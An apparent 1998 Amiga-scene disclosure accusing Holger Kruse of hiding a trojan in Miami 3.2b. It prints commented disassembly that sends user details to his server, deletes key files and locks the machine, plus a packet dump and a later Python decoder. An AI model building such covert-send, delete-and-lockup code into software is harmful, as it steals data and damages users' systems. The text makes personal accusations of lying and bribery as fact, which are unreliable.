DIGITAL CORRUPTION 1998

Amiga Internet Users Security Warning
Miami has a serious user security breach
and the culprit is Holger Kruse.
11.12.98 - DC'98

We decided without further delays that it was about time to give people some
ABSOLUTE proof regarding the "rumoured" information sending built into Miami
TCP. Every detail discussed below refers ONLY to the distribution archive of
Miami 3.2b available from www.nordicglobal.com (exe size 389656 (020)).

There has been a lot of talk about this in the past, however until now nobody
has provided users with REAL PROOF that will allow EVERY SINGLE Miami user to
ask themselves if they find this kind of behaviour in a TCP stack on an Amiga
acceptable. It simply CANNOT be denied now.
REGARDLESS of the circumstances that trigger the below procedure, it is our
belief, and the belief of MANY other Amiga internet users, that this procedure
is simply no more than a glorified trojan horse, and should even be classified
as such in future virus killers.

The plain and simple facts ARE that Miami sends your username, IP, DNS, real
name (if entered in), registration name, licence number and email address (if
possible) to Holger's server. It also signals another process using an
interprocess port to delete various keys around the user's system if certain
conditions are true. Then it kindly locks down your system, ensuring that you
lose any unsaved work in memory.

Digital Corruption now states unequivocally that Holger Kruse has coded into
Miami TCP a mechanism which sends to him information on the Miami user, of
which he compiles a database.

Below is a reasonably commented (not to the point of stupidity) resource of
Miami's info sending mechanism, which Holger Kruse has denied exists on at
least one occasion; on another occasion he claimed Miami does not lock up, and
yet again he has claimed the deletion of key files does not happen. Also below
is a full description of the outgoing data and an actual captured packet from
Miami en route to h1.nordicglobal.com. Some level of understanding of simple
Motorola assembly language and the workings of the Amiga OS is assumed, but
even a less knowledgeable user should be able to get the drift of the
information contained below.

Regarding the key deletion system, various keyfiles are searched for and then
a procedure is called which signals another process via PutMsg() etc., and as
a result that other process carries out the removal of the keyfiles. Just
before the system lockdown there is a small delay; this is to allow DOS to
finish deleting the keys (after all it's being handled by another process)
before locking down.
If lockdown occurred before DOS had finished deleting, the result would be an
invalidated or worse hard drive.

Regarding the lockdown, this is simple to see and can't be denied. Holger
calls Disable() and then throws Miami into an unexitable loop.

Regarding the actual information sending, it's clear to see where the
information is compiled and moved into an area ready for sending. It's also
clear to see the references to Holger's server and finally the Socket() and
SendTo() calls.

With such PLAIN evidence that Holger Kruse has been lying and coding trojan
send routines into Miami, it remains to be seen whether he will continue to
blame DC in an attempt to divert attention from his code, or whether finally
he will admit he offered a bribe to DC to remain quiet, admit he locks down
systems, admit he receives clandestine user information, and admit he deletes
keys off people's systems. Time will tell, but once a liar always a liar.

In conclusion, the discussion of "is there any such thing in Miami" is now
WELL AND TRULY closed. Anybody even bothering to discuss and question this
after seeing the information below is either an idiot, a fanatic or a liar.
Holger Kruse, consider yourself exposed.

Digital Corruption 98.

-----------------------------------------------------------------------------

DECOMPILED CODE SEGMENT FROM MIAMI 3.2B DISTRIBUTION FROM WWW.NORDICGLOBAL.COM
STARTING FROM OFFSET $13326

*** NOTE the label endless_loop for proof of lock ups.

The procedure violate_users_privacy is responsible for sending out the
information, and we encourage anybody reading this to skip down to that
procedure labelled below and read through the commenting.

...
nordicglobal:
    dc.l    $1002704C               ;704C = port 28748
    dc.l    $CDA0F929               ;h1.nordicglobal.com
    dc.l    0                       ;205.160.249.41
    dc.l    0
Miami.MSG0:     dc.b 'Miami:',0,0
Miamikey1.MSG:  dc.b 'Miami.key1',0,0
Miamikey2.MSG:  dc.b 'Miami.key2',0,0
S.MSG0:         dc.b 'S:',0,0
PPPkey.MSG:     dc.b 'PPP.key',0
X11.MSG:        dc.b 'X11:',0,0
AmiWinkey.MSG:  dc.b 'AmiWin.key',0,0
packet_header:  dc.b '$MPRNFY1',0,0       ;for remote server logging
REPLYTO:        dc.b 'REPLYTO',0          ;env. variable to get info from

KillKeyFiles:
    SUB.W   #$44,SP
    MOVEM.L D2/D6/D7/A2/A3/A5/A6,-(SP)
    SUB.L   A1,A1
    MOVE.L  execbase-DT(A4),A6
    JSR     _LVOFindTask(A6)        ;FindTask(NULL) = our own process
    MOVE.L  D0,A5
    JSR     _LVOCreateMsgPort(A6)   ;port used to talk to the deleting process
    MOVE.L  D0,A3
    TST.L   D0
    BEQ     lbC013446
    MOVEQ   #-1,D0
    MOVE.L  $B8(A5),A2              ;save pr_WindowPtr
    MOVE.L  D0,$B8(A5)              ;pr_WindowPtr = -1: no DOS requesters
                                    ;can pop up while the keys are removed
    LEA     Miami.MSG0(PC),A0
    MOVE.L  dosbase-DT(A4),A6
    MOVEQ   #-2,D2                  ;ACCESS_READ
    MOVE.L  A0,D1
    JSR     _LVOLock(A6)            ; get a lock on the Miami: dir.
    MOVE.L  D0,D7
    BEQ.S   lbC0133CC
    MOVE.L  D7,D1
    JSR     _LVOCurrentDir(A6)
    PEA     Miamikey1.MSG(PC)       ; look for Miami.key1
    MOVE.L  D0,D6
    MOVE.L  D7,-(SP)
    MOVE.L  A3,-(SP)
    PEA     $28(SP)
    BSR     lbC013230               ; delete it!
    PEA     Miamikey2.MSG(PC)       ; look for Miami.key2
    MOVE.L  D7,-(SP)
    MOVE.L  A3,-(SP)
    PEA     $38(SP)
    BSR     lbC013230               ; delete it too!
    LEA     $20(SP),SP
    MOVE.L  D6,D1
    JSR     _LVOCurrentDir(A6)
    MOVE.L  D7,D1
    JSR     _LVOUnLock(A6)          ; release the lock on Miami:
lbC0133CC:
    LEA     S.MSG0(PC),A0
    MOVE.L  A0,D1
    JSR     _LVOLock(A6)            ; get a lock on the S: dir
    MOVE.L  D0,D7
    BEQ.S   lbC013402
    MOVE.L  D7,D1
    JSR     _LVOCurrentDir(A6)
    PEA     PPPkey.MSG(PC)          ; look for PPP.key
    MOVE.L  D0,D6
    MOVE.L  D7,-(SP)
    MOVE.L  A3,-(SP)
    PEA     $28(SP)
    BSR     lbC013230               ; delete it!
    LEA     $10(SP),SP
    MOVE.L  D6,D1
    JSR     _LVOCurrentDir(A6)
    MOVE.L  D7,D1
    JSR     _LVOUnLock(A6)
lbC013402:
    LEA     X11.MSG(PC),A0
    MOVE.L  A0,D1
    JSR     _LVOLock(A6)            ; get a lock on X11: dir
    MOVE.L  D0,D7
    BEQ.S   lbC013438
    MOVE.L  D7,D1
    JSR     _LVOCurrentDir(A6)
    PEA     AmiWinkey.MSG(PC)       ; look for AmiWin.key
    MOVE.L  D0,D2
    MOVE.L  D7,-(SP)
    MOVE.L  A3,-(SP)
    PEA     $28(SP)
    BSR     lbC013230               ; delete it!
    LEA     $10(SP),SP
    MOVE.L  D2,D1
    JSR     _LVOCurrentDir(A6)
    MOVE.L  D7,D1
    JSR     _LVOUnLock(A6)
lbC013438:
    MOVE.L  A2,$B8(A5)              ;restore pr_WindowPtr
    MOVE.L  execbase-DT(A4),A6
    MOVE.L  A3,A0
    JSR     _LVODeleteMsgPort(A6)
lbC013446:
    MOVEM.L (SP)+,D2/D6/D7/A2/A3/A5/A6  ;clean up and return
    ADD.W   #$44,SP
    RTS

violate_users_privacy:
    SUB.W   #$100,SP                ;$100 bytes of stack: the packet is built
                                    ;at $34(SP), the sockaddr at $F0(SP)
    LEA     nordicglobal(PC),A0     ;ptr to IP address to send to
    LEA     $F0(SP),A1              ;which is h1.nordicglobal.com
    MOVE.L  (A0)+,(A1)+             ;(CDA0F929=205.160.249.41)
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    LEA     packet_header(PC),A0    ;$MPRNFY1 - Miami PiRate ideNtiFY 1 (?)
    LEA     $34(SP),A1              ;probably used so remote server knows
    MOVE.L  (A0)+,(A1)+             ;to log this packet
    MOVE.L  (A0)+,(A1)+
    LEA     licence_code-DT(A4),A0  ;Hashed Miami licence code
    LEA     $3C(SP),A1
    MOVE.L  (A0)+,(A1)+
    LEA     licence_dec-DT(A4),A0   ;20 Digit Miami licence code
    LEA     $40(SP),A1              ;in decimal form
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    LEA     reg_name-DT(A4),A0      ;Gets the name of the user from
    LEA     $54(SP),A1              ;the Miami keyfiles information
    MOVE.L  (A0)+,(A1)+             ;Here Miami gets your name and
    MOVE.L  (A0)+,(A1)+             ;adds it into the packet just
    MOVE.L  (A0)+,(A1)+             ;after your licence code
    MOVE.L  (A0)+,(A1)+
    LEA     TCPIP_name-DT(A4),A0    ;TCP/IP Real Name information
    LEA     $64(SP),A1              ;this part is responsible for
    MOVE.L  (A0)+,(A1)+             ;adding your "real name" setting
    MOVE.L  (A0)+,(A1)+             ;in Miami TCP/IP into the packet
    MOVE.L  (A0)+,(A1)+             ;destined for Holger
    MOVE.L  (A0)+,(A1)+
    LEA     TCPIP_user-DT(A4),A0    ;Right here is where your
    LEA     $74(SP),A1              ;username in TCP/IP settings is
    MOVE.L  (A0)+,(A1)+             ;added into the outgoing packet
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    LEA     login_name-DT(A4),A0    ;Your ISP login/username is snared
    LEA     $84(SP),A1              ;right here
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    MOVE.L  (A0)+,(A1)+
    CLR.L   -(SP)
    BSR     lbC013590               ;Call a subroutine to get a pointer
    ADDQ.W  #4,SP                   ;to various current session details
    MOVE.L  D0,A0                   ;(IP, DNS etc)
    LEA     8(A0),A1
    LEA     $94(SP),A0              ;Adds your current IP address
    MOVE.L  (A1)+,(A0)+             ;into the outgoing information
    MOVE.L  D0,A5
    LEA     12(A5),A0
    LEA     $98(SP),A1              ;Add in your primary DNS server IP
    MOVE.L  (A0)+,(A1)+
    LEA     REPLYTO(PC),A0          ;Here we get ready to make an OS call
    MOVEQ   #0,D4                   ;in order to get information stored
    MOVEQ   #$30,D3                 ;(if any) in the env. variable 'REPLYTO'
    MOVE.L  A0,D1                   ;which would be your email reply address
    LEA     3(SP),A0                ;(if your mailer uses this or is set up
    MOVE.L  A0,D2                   ;this way)
    MOVE.L  dosbase-DT(A4),A6
    JSR     _LVOGetVar(A6)          ;GetVar() copies $REPLYTO into the 48-byte
    TST.L   D0                      ;buffer at 3(SP) and returns its length
    BLE.S   no_email_var            ;(-1 if unset); no replyto email? then
                                    ;miss some stuff
    MOVE.L  D2,A0
    LEA     $9C(SP),A1
    MOVEQ   #$30,D0
    BSR     lbC018072               ;copies contents of the env.var to the
                                    ;outgoing packet area. (copystring proc)
    BRA.S   was_email_var
no_email_var:
    CLR.W   $9C(SP)                 ;zeros first word of area of packet that
                                    ;contains replyto if no email var set.
was_email_var:
    MOVE.L  miami_verstring(A4),A0  ;adds the version string of the Miami
    LEA     $CC(SP),A1              ;being used into the packet to be
    MOVEQ   #$20,D0                 ;sent. Something like:
                                    ;$VER: Miami 3.0a (06.03.98)
    BSR     lbC018072               ;call string copy to copy in $VER:
    MOVEQ   #4,D1                   ;word index of the first word to encode
                                    ;($3C-$34 = 8 bytes in = word 4)
    MOVE.L  $104(SP),D0             ;this routine's stack argument
    MOVE.W  D0,$EC(SP)              ;its low word goes in at packet offset $B8
    CLR.W   $EE(SP)                 ;last 2 bytes blanked
    LEA     $3C(SP),A5              ;pointer to start of packet data
                                    ;to crypt. Why the cryption if this
                                    ;is so "above board"?
                                    ;doesn't crypt '$MPRNFY1' as that's
                                    ;used by the remote server as a
                                    ;way of identifying what this packet
                                    ;is for (sending your info).
crypto:
    MOVE.W  -2(A5),D0               ;Encode the outgoing data using
    ADDQ.L  #1,D1                   ;progressive ADD.W: each word gets the
    ADD.W   D0,(A5)                 ;(already encoded) previous word added
    ADDQ.L  #2,A5
    MOVEQ   #$5E,D0
    CMP.L   D0,D1
    BLT.S   crypto                  ;continue cryption whilst necessary
                                    ;(words 4..93, i.e. up to offset $BA)
    MOVEQ   #2,D0                   ;domain AF_INET
    MOVEQ   #0,D2                   ;protocol 0
    MOVE.L  D0,D1                   ;type 2 = SOCK_DGRAM, so this is UDP
    MOVE.L  bsdbase-DT(A4),A6
    JSR     _LVOSocket(A6)          ;Initialize a socket for sending
    MOVEQ   #$5E,D1
    MOVEQ   #$10,D3                 ;length of tolen (sockaddr)
    ADD.L   D1,D1                   ;d1=length of data to send
                                    ;(which is 188 bytes)
    LEA     $34(SP),A0              ;PTR to data that was initialized above.
                                    ;i.e. starting with $MPRNFY1 which is
                                    ;CLEARLY moved into this memory area
                                    ;which is about to be sent to Holger,
                                    ;followed by all the other information!
    LEA     $F0(SP),A1              ;PTR to struct sockaddr
    JSR     _LVOSendTo(A6)          ;SendTo() - You have now been violated.
                                    ;This is the call that sends all the
                                    ;information that has been compiled
                                    ;to Holger's server. It's clear to see
                                    ;that the destination is in fact
                                    ;h1.nordicglobal.com and the data
                                    ;sent is all the data that was prepared
                                    ;above
                                    ;PTR to data = $34(SP) = start of info
                                    ;PTR to sockaddr = $F0(SP) = clearly
                                    ;addressing h1.nordicglobal.com
    BSR     KillKeyFiles            ;Let's kill the user's keys now
    MOVEQ   #$5A,D1
    ADD.L   D1,D1                   ;180 ticks of 1/50 s = 3.6 seconds
    MOVE.L  dosbase-DT(A4),A6       ;give DOS time to finish deleting
    JSR     _LVODelay(A6)           ;all the keyfiles!
    BSR     cripplesystem
endless_loop:
    BRA.S   endless_loop            ;And here it is...a nice infinite
                                    ;loop after a Disable()
                                    ;Net result = system lockup.
cripplesystem:
    MOVE.L  A6,-(SP)
    MOVE.L  execbase-DT(A4),A6
    JSR     _LVODisable(A6)         ;disable interrupt processing
                                    ;or simply speaking...
                                    ;this stops the machine doing anything
                                    ;other than run this task, i.e. shuts
                                    ;down all system functions, multitasking
                                    ;etc...the lot, until an Enable() is
                                    ;called.
    MOVE.L  (SP)+,A6
    RTS

-----------------------------------------------------------------------------

Information on the outgoing packet:

The information sent to h1.nordicglobal.com is 188 bytes in length and is
made up as follows...

Offset $00 : contains the string '$MPRNFY1'                (  8 bytes)
Offset $08 : hashed Miami licence code                     (  4 bytes)
Offset $0C : Miami licence code in decimal form            ( 20 bytes)
Offset $20 : Name of registered user from keyfiles         ( 16 bytes)
Offset $30 : Real name from Miami TCP settings             ( 16 bytes)
Offset $40 : User name from Miami TCP settings             ( 16 bytes)
Offset $50 : User's ISP login                              ( 16 bytes)
Offset $60 : Current IP address (longword form)            (  4 bytes)
Offset $64 : Primary DNS server (longword form)            (  4 bytes)
Offset $68 : Contents of REPLYTO env. variable             ( 48 bytes)
Offset $98 : Current Miami $VER: string                    ( 32 bytes)
Offset $B8 : 2 bytes of something                          (  2 bytes)
Offset $BA : last 2 bytes are blanked                      (  2 bytes)
                                                    TOTAL    188 bytes

-----------------------------------------------------------------------------

Below is an actual captured packet (minus some critical information removed)
from the information send mechanism coded into Miami:

Miami Packet:
  flags  = $00000000
  itype  = $01
  ptype  = $00
  data   = $101F77A8
  length = $000000D8

INET Packet:
  ip_v     = $45
  ip_tos   = $00
  ip_len   = $00D8
  ip_id    = $91BF
  ip_off   = $0000
  ip_ttl   = $33
  ip_p     = $11
  ip_sum   = $9DF2
  ip_src   = xxx.xxx.xxx.xxx    ; source IP
  ip_dst   = 205.160.249.41     ; 205.160.249.41 (cd a0 f9 29)
  th_sport = 1029
  th_dport = 28748              ; "h1.nordicglobal.com"
  th_seq   = $00C4C8D8
  th_ack   = $244D5052
  th_off   = $4E
  th_flags = $46
  th_win   = $5931
  th_sum   = $C96C
  th_urp   = $E01B

00B0
0000: 134B 457B 75AB AEDD E013 1144 4476 7CA9  '.KE{u......DDv|.'
0010: B1DC E414 2C79 9EE6 0054 209B 8A00 FC65  '....,y...T ....e'
0020: 6AD8 6B28 6B8C D8F5 475E BAD2 2D33 A1A2  'j.k(k...G^..-3..'
0030: 13A2 13A2 1411 8385 8385 8385 8385 8385  '................'
0040: 8385 8385 XXXX XXXX D155 D155 D155 D155  '......cU.U.U.U.U'
0050: D155 D155 XXXX XXXX XXXX XXXX 0785 0805  '.U.U._.x........'
0060: 700A E1BE 49D5 CCB5 34D5 DE39 DE39 DE46  'p...I...4..9.9.F'
0070: 4646 68D2 68D2 6952 D155 56E9 BF09 686D  'FFh.h.iR.UV...hm'
0080: D070 5734 BF54 68D8 D0F8 8890 ACE6 F238  '.pW4.Th........8'
0090: 2C58 79C1 DB2E 444E 777C A7DD C805 F83B  ',Xy...DNw|.....;'
00A0: 266B 5999 92D1 BBD1 FF40 6FB9 6FB9 6FB9  '&kY......@o.o.o.'

INET Options:

IAC Packet:
00D8
0000: 4500 00D8 91BF 0000 3311 9DF2 CB0A 5019  'E.......3.....P.'
0010: CB16 7129 0405 704C 00C4 C8D8 244D 5052  '..q)..pL....$MPR'
0020: 4E46 5931 C96C E01B 134B 457B 75AB AEDD  'NFY1.l...KE{u...'
0030: E013 1144 4476 7CA9 B1DC E414 2C79 9EE6  '...DDv|.....,y..'
0040: 0054 209B 8A00 FC65 6AD8 6B28 6B8C D8F5  '.T ....ej.k(k...'
0050: 475E BAD2 2D33 A1A2 13A2 13A2 1411 8385  'G^..-3..........'
0060: 8385 8385 8385 8385 8385 8385 XXXX XXXX  '..............cU'
0070: D155 D155 D155 D155 D155 D155 XXXX XXXX  '.U.U.U.U.U.U._.x'
0080: XXXX XXXX 0785 0805 700A E1BE 49D5 CCB5  '........p...I...'
0090: 34D5 DE39 DE39 DE46 4646 68D2 68D2 6952  '4..9.9.FFFh.h.iR'
00A0: D155 56E9 BF09 686D D070 5734 BF54 68D8  '.UV...hm.pW4.Th.'
00B0: D0F8 8890 ACE6 F238 2C58 79C1 DB2E 444E  '.......8,Xy...DN'
00C0: 777C A7DD C805 F83B 266B 5999 92D1 BBD1  'w|.....;&kY.....'
00D0: FF40 6FB9 6FB9 6FB9                      '.@o.o.o.'

-----------------------------------------------------------------------------
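As an added example (not part of the original file, and not Miami's or Holger Kruse's code), here is a Python model of the 188-byte $MPRNFY1 payload: it applies the progressive ADD.W chaining of the crypto loop, inverts it, and splits a decoded payload by the offsets in the table above. The field names and all sample values are constructed placeholders.

```python
import struct

HEADER = b"$MPRNFY1"
PACKET_LEN = 188                 # $5E words * 2, the length handed to SendTo()
FIRST_WORD, END_WORD = 4, 0x5E   # the crypto loop touches word indices 4..93
FIELDS = [  # layout from the "Information on the outgoing packet" table
    ("header", 0x00, 8), ("hashed_licence", 0x08, 4), ("licence_decimal", 0x0C, 20),
    ("reg_name", 0x20, 16), ("real_name", 0x30, 16), ("user_name", 0x40, 16),
    ("isp_login", 0x50, 16), ("ip_addr", 0x60, 4), ("dns_addr", 0x64, 4),
    ("replyto", 0x68, 48), ("ver_string", 0x98, 32), ("unknown", 0xB8, 2), ("blank", 0xBA, 2),
]
RAW_FIELDS, ADDR_FIELDS = {"header", "hashed_licence", "unknown", "blank"}, {"ip_addr", "dns_addr"}

def chain(buf, decode=False):
    # The 'crypto' loop: enc[i] = (plain[i] + enc[i-1]) mod 2^16 for i in 4..93;
    # word 3 ('Y1' of the header) seeds it. Decoding subtracts instead and walks
    # backwards, so enc[i-1] is still the encoded value when word i is undone.
    w = list(struct.unpack(">94H", buf))
    order = range(END_WORD - 1, FIRST_WORD - 1, -1) if decode else range(FIRST_WORD, END_WORD)
    for i in order:
        w[i] = (w[i] - w[i - 1] if decode else w[i] + w[i - 1]) & 0xFFFF
    return struct.pack(">94H", *w)

def build_notification(values):
    # Lay constructed field values out at the documented offsets, then encode.
    buf = bytearray(PACKET_LEN)
    buf[0:8] = HEADER
    for name, off, size in FIELDS:
        val = values.get(name)
        if val is not None:
            val = val.encode("latin-1") if isinstance(val, str) else bytes(val)
            buf[off:off + size] = val[:size].ljust(size, b"\0")
    return chain(bytes(buf))

def parse_notification(payload):
    # Validate, decode and split a $MPRNFY1 UDP payload into named fields.
    if len(payload) != PACKET_LEN or payload[:8] != HEADER:
        raise ValueError("not a 188-byte $MPRNFY1 notification")
    plain, out = chain(payload, decode=True), {}
    for name, off, size in FIELDS:
        chunk = plain[off:off + size]
        if name in ADDR_FIELDS:
            out[name] = ".".join(str(b) for b in chunk)   # longword IP -> dotted quad
        elif name in RAW_FIELDS:
            out[name] = chunk.hex()
        else:
            out[name] = chunk.split(b"\0", 1)[0].decode("latin-1")  # NUL-padded text
    return out

# Constructed sample values (placeholders, not taken from any real capture)
SAMPLE = {
    "hashed_licence": bytes.fromhex("deadbeef"), "licence_decimal": "01234567890123456789",
    "reg_name": "Jane Example", "user_name": "jane", "isp_login": "jane-isp",
    "ip_addr": [192, 0, 2, 10], "dns_addr": [192, 0, 2, 53], "replyto": "jane@example.net",
    "ver_string": "$VER: Miami 3.2b (sample)",
}
```

Because adding a zero word leaves the running sum unchanged, the runs of one repeated word in the captured dump (8385 8385 ..., D155 D155 ..., 6FB9 6FB9 ...) are the NUL padding of the fixed-width text fields, so the chaining hides the field boundaries far less than it appears to. Note also that the socket is opened with type 2 (SOCK_DGRAM) and the capture shows ip_p = $11 (UDP), so the th_* fields the sniffer printed are a TCP template laid over the 8-byte UDP header: th_ack = $244D5052 is the '$MPR' start of the payload.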